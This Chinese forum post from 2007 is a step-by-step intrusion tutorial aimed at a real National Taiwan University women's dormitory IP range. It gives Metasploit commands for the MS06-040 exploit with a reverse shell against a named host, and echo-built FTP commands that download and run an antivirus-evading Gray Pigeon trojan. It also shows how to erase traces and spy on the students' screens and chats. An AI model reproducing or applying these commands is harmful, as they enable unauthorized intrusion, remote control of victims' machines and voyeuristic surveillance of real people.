论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2007-08-01 12:03 |只看该作者 |倒序浏览

　　你想知道台湾大学女生的电脑里面都有些什么东西吗？你想知道台湾大学女生每天都用电脑做些什么吗？带着这些疑问，下面我们就来入侵一台台湾大学女生的电脑来看看吧。废话不多说，开始行动！\r\n　　首先用纯真IP数据库来查找台湾大学女生宿舍的IP。打开软件后选“地址->IP段”，再在查询字段里面输入“台湾大学”，点查询，出来了很多结果。\r\n　　\r\n　　我们随便找一段IP，就找140.112.227.0～140.112.227.255吧，是台湾大学女七舍（法学院）的。说干就干，接下来我们就利用微软8月份发布的MS06040漏洞来入侵。要利用这个漏洞，首先当然是扫描，搬出我们的扫描软件rpc-server Scanner。打开扫描软件后，填上IP段140.112.227.1～140.112.227.255。\r\n　\r\n　　看到扫描结果这一行，一般显示“Vulnerable”字眼的主机我们就可以用来溢出了。别告诉我你什么都扫不到，扫不到也是很正常的，因为现在好多地方都对ADSL用户发出的数据包限制了。此时你就只有用代理肉鸡或者改线程扫了，至于如何用代理肉鸡或者改线程，这里就不具体说了。我们现在已经扫到140.112.227.104这台机器了，接下来就溢出吧。这里我们使用Metasploit这个工具，Metasploit里面包含了很多溢出程序，当然也包含了ms06040这个漏洞的溢出程序。安装Metasploit后，我们在“开始->程序”里找到Metasploit framework，打开MSFConsole。\r\n　　\r\n　　在“msf >”后输入“use netapi_ms06_040”，回车；输入“set PAYLOAD win32_reverse”，回车；输入“set RHOST IP”，回车，这里的IP要填上你要溢出的主机IP，也就是140.112.227.104。再输入“set LHOST IP”，回车，这里的IP是当前使用的主机的IP，注意要用公网的IP，如果你在局域网内，就要想办法把自己的主机映射出去。接下来输入“set TARGET 0”，回车。全部完成后输入“exploit”，按回车后就开始溢出了。当出现以下内容时，就说明你已经成功溢出得到一个Shell了。\r\n　　msf > use netapi_ms06_040\r\n　　msf netapi_ms06_040 > set PAYLOAD win32_reverse\r\n　　PAYLOAD -> win32_reverse\r\n　　msf netapi_ms06_040(win32_reverse) > set RHOST 140.112.227.104 \r\n　　RHOST -> 140.112.227.104\r\n　　msf netapi_ms06_040(win32_reverse) > set LHOST xxx.xxx.xxx.xxx\r\n　　LHOST -> xxx.xxx.xxx.xxx\r\n　　msf netapi_ms06_040(win32_reverse) > set TARGET 0\r\n　　TARGET -> 0\r\n　　msf netapi_ms06_040(win32_reverse) > exploit\r\n　　

Starting Reverse Handler.\r\n　　

Detected a Windows xp target\r\n　　

This will not work on SP2！\r\n　　

Sending request...\r\n　　

The server rejected it,trying again…\r\n　　

Got connection from 140.112.227.104:4321 <-> xxx.xxx.xxx.xxx:1039\r\n　　\r\n　　Microsoft Windows XP [乜 5.1.2600]\r\n　　(C) Copyright 1985-2001 Microsoft Corp.\r\n　　\r\n　　C:\\WINDOWS\\system32>\r\n　　\r\n　　到了这里，说明我们已经入侵成功了。接下来就看你自己想留什么样的后门了。如果是Windows 2000或Windows 2003，我们就可以直接克隆一个隐藏的管理员账号开个3389了。如果对方是Windows XP就比较麻烦了，当你用3389连接时，对方的屏幕会提示是否允许连接。此时怎么办呢？我们可以上传个木马。这里就用灰鸽子吧。至于上传，这可能会难倒一些新手，没关系，告诉你一种好方法。上传的方法有很多，比如用TFTP、写VBS脚本等。我试用过很多方法，觉得对于外网主机来说，最好用的还是写个TXT文件，然后再用FTP执行上传。这种方法需要有个FTP空间，先把你的木马上传到FTP空间，然后在命令行下执行echo命令写一个TXT文件。写TXT文件的命令如下：\r\n　　\r\n　　echo open 你FTP主机的IP>>1.txt\r\n　　echo FTP的用户名>>1.txt\r\n　　echo FTP的密码>>1.txt\r\n　　echo bin>>1.txt\r\n　　echo get 木马的名字.exe>>1.txt\r\n　　echo bye>>1.txt\r\n　　\r\n　　这些代码要一行一行的写，写完一行后回车。全部写完后，我们再来看看是不是写进去了。输入“dir 1.txt”，说明我们的TXT写入成功了。\r\n\r\n　　由于台湾省的操作系统是繁体中文的，而我的电脑又没安装繁体语言包，里面的繁体字全部显示为乱码。1.txt成功写入后，我们再执行“ftp –s:1.txt”这个命令，稍等一下。\r\n\r\n　　这里的h.exe就是我做的自动上线免杀灰鸽子服务端。上传成功后，输入h.exe运行。成功后我们还有一件重要的事要做，就是删除我们一开始写入的1.txt，要不你的FTP账号就会被别人看到了，执行“del 1.txt”即可。好拉，安全工作做完了，我们就打开灰鸽子等待肉鸡上线吧。呵呵，不过几秒钟，我们的肉鸡就上线了。\r\n\r\n　　接下来我们就屏幕监控，看看台湾大学的女学生们都在做些什么。原来台湾省的MM不用QQ，喜欢聊MSN。如果你想和台湾省的MM亲密交流的话，就加上她的MSN吧。\r\n\r\n　　其实除了MS06040漏洞溢出以外，我们还有很多方法可以拿到shell的，这就要看你自己平时掌握的东西了。好啦，整个入侵过程到此就结束了，要是有什么不明白的地方，欢迎大家到黑防官方论坛发言，我们共同讨论，共同提高！